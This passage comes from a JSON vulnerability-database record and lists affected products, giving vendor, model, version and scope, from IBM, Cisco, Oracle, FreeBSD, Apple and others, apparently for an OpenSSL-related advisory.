      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.11-28"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "qradar",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "security appscan enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.2"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.31"
      },
      {
        "model": "mysql workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.1.5"
      },
      {
        "model": "prime optical for sps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "pureapplication system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1"
      },
      {
        "model": "abyp-2t-1s-1l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4.1.0"
      },
      {
        "model": "mds series multilayer switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90006.2.17"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.19"
      },
      {
        "model": "rational software architect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "project openssl 1.0.1r",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network controller 1.0.3350m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "anyconnect secure mobility client for linux",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.3"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.3"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.0.0"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.10"
      },
      {
        "model": "netezza platform software 7.2.0.4-p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.03"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5.0.997"
      },
      {
        "model": "anyconnect secure mobility client for os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "x4.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.44"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.1.0"
      },
      {
        "model": "unified ip phone series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "79000"
      },
      {
        "model": "anyconnect secure mobility client for android",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.3"
      },
      {
        "model": "lancope stealthwatch flowsensor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "tivoli composite application manager for transactions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.0.0"
      },
      {
        "model": "connected analytics for collaboration 1.0.1q",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "jabber guest",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.26"
      },
      {
        "model": "abyp-2t-1s-1l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "show and share",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2(2)"
      },
      {
        "model": "lancope stealthwatch flowcollector sflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.7.3"
      },
      {
        "model": "mmp server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.2"
      },
      {
        "model": "tivoli provisioning manager for images",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.19"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.30.0-13"
      },
      {
        "model": "abyp-10g-2sr-2lr-1-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "computer telephony integration object server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.51"
      },
      {
        "model": "tivoli provisioning manager for images build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.20280.6"
      },
      {
        "model": "unified communications for microsoft lync",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.6.7"
      },
      {
        "model": "prime security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.3.4.2-4"
      },
      {
        "model": "anyres live",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.14"
      },
      {
        "model": "ons series multiservice provisioning platforms",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1545410.6.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.16"
      },
      {
        "model": "telepresence isdn link",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational software architect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.2.1"
      },
      {
        "model": "telepresence server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70104.4"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.4"
      },
      {
        "model": "packet tracer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2"
      },
      {
        "model": "openssh for gpfs for windows",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5.0.31"
      },
      {
        "model": "agent for openflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.0.7"
      },
      {
        "model": "unified attendant console business edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cloud manager with openstack interim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.5"
      },
      {
        "model": "cognos business intelligence interim fix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.117"
      },
      {
        "model": "unified contact center enterprise",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.51"
      },
      {
        "model": "tandberg codian isdn gw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "32200"
      },
      {
        "model": "show and share",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2(3)"
      },
      {
        "model": "globalprotect agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "3.1.0"
      },
      {
        "model": "netezza platform software 7.1.0.9-p1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "abyp-2t-2s-0l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "powerkvm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "webex meetings for wp8",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.0"
      },
      {
        "model": "webex meetings for android",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.1"
      },
      {
        "model": "mds series multilayer switches 7.3.1nx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9000"
      },
      {
        "model": "mds series multilayer switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90000"
      },
      {
        "model": "ios software and cisco ios xe software",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "16.3.1"
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.0.2"
      },
      {
        "model": "webex meeting center",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.9.0.5"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.15-36"
      },
      {
        "model": "ace application control engine module",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "300"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.34"
      },
      {
        "model": "exalogic infrastructure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "1.0"
      },
      {
        "model": "lancope stealthwatch flowsensor",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.7.3"
      },
      {
        "model": "proventia network enterprise scanner",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.1.4"
      },
      {
        "model": "tivoli provisioning manager for os deployment build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.1051.08"
      },
      {
        "model": "nac guest server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "local collector appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.2.10"
      },
      {
        "model": "enterprise content delivery system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mediasense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(1)"
      },
      {
        "model": "email security appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.22"
      },
      {
        "model": "security network controller 1.0.3387m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.1"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.11"
      },
      {
        "model": "mobile foundation consumer edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.0.0"
      },
      {
        "model": "prime collaboration deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "webex meetings client hosted t31r1sp6",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "cloud manager with openstack interim fix1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.6"
      },
      {
        "model": "9.3-release-p35",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "dx series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "virtualization experience media engine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security network controller 1.0.3379m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "video surveillance series ip cameras",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60002.8"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3x000"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.18"
      },
      {
        "model": "packet tracer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.3"
      },
      {
        "model": "unified sip proxy",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.0"
      },
      {
        "model": "mysql server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.7.12"
      },
      {
        "model": "abyp-0t-4s-0l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "10.2-release-p10",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "netezza platform software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.7"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.0.1"
      },
      {
        "model": "spa50x series ip phones",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6.5"
      },
      {
        "model": "netezza platform software",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.9"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "abyp-4ts-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.17"
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.5"
      },
      {
        "model": "netezza platform software 7.2.0.8-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "ata series analog terminal adaptor",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1901.3"
      },
      {
        "model": "digital media players series 5.4 rb",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4400"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.4"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.14"
      },
      {
        "model": "virtualization experience media engine",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5.1"
      },
      {
        "model": "rational application developer for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "abyp-10g-4lr-1-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "telepresence server on multiparty media",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3200"
      },
      {
        "model": "abyp-10g-4lr-1-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "video surveillance ptz ip cameras",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.8"
      },
      {
        "model": "9.3-release-p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.6"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.10"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.43"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4.0.0"
      },
      {
        "model": "unified communications for microsoft lync",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "jabber software development kit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "spa122 ata with router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "10.1-release-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "9.3-stable",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "tivoli composite application manager for transactions if03",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.4.0.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.18"
      },
      {
        "model": "rational application developer for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.4"
      },
      {
        "model": "identity services engine",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.2.1"
      },
      {
        "model": "10.1-release-p9",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.1"
      },
      {
        "model": "tivoli provisioning manager for os deployment build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.151.05"
      },
      {
        "model": "webex meetings server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.7"
      },
      {
        "model": "i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.2.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.16"
      },
      {
        "model": "mysql server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.21"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.4"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(2.10000.5)"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.26"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.14"
      },
      {
        "model": "project openssl 1.0.1c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.1.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.35"
      },
      {
        "model": "telepresence mx series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.3.7"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0"
      },
      {
        "model": "telepresence server on multiparty media",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3204.4"
      },
      {
        "model": "lancope stealthwatch flowcollector sflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8"
      },
      {
        "model": "qradar siem/qrif/qrm/qvm patch",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.71"
      },
      {
        "model": "digital media players series 5.3 rb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4300"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1768"
      },
      {
        "model": "telepresence profile series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.3.7"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.41"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.36"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.1"
      },
      {
        "model": "openssh for gpfs for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5"
      },
      {
        "model": "abyp-0t-0s-4l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "mac os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.6"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "project openssl 1.0.1f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "nexus series switches 7.3.1nx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7000"
      },
      {
        "model": "jabber for android mr",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.6"
      },
      {
        "model": "project openssl 1.0.2a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "abyp-4t-0s-0l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "netezza platform software 7.2.0.4-p3",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "algo audit and compliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "project openssl 1.0.2f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.22"
      },
      {
        "model": "rational software architect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.2"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.2919"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.5"
      },
      {
        "model": "connected grid router-cgos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.30"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.9"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.19"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.10"
      },
      {
        "model": "worklight enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.0"
      },
      {
        "model": "tivoli provisioning manager for images",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.0"
      },
      {
        "model": "lancope stealthwatch smc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "service delivery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.4"
      },
      {
        "model": "unified ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "69450"
      },
      {
        "model": "telepresence server on virtual machine mr2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2"
      },
      {
        "model": "anyconnect secure mobility client",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.3"
      },
      {
        "model": "nexus series switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60008.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.6"
      },
      {
        "model": "mysql server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.15"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.30.2-9"
      },
      {
        "model": "abyp-0t-2s-2l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "nexus series switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70008.3"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.0"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.2"
      },
      {
        "model": "webex meetings server ssl gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "-0"
      },
      {
        "model": "mysql server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.25"
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6.1146-110"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "messagesight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2"
      },
      {
        "model": "prime network services controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "lancope stealthwatch flowcollector sflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.1"
      },
      {
        "model": "ironport email security appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "9.3-release-p3",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.15"
      },
      {
        "model": "prime collaboration provisioning",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.2"
      },
      {
        "model": "sterling connect:express for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.12"
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6.1146-113"
      },
      {
        "model": "lancope stealthwatch flowsensor",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.3"
      },
      {
        "model": "spa30x series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.30-12"
      },
      {
        "model": "tivoli netcool system service monitors",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.3"
      },
      {
        "model": "webex meetings client on premises",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "-0"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.19"
      },
      {
        "model": "telepresence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70100"
      },
      {
        "model": "rational software architect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
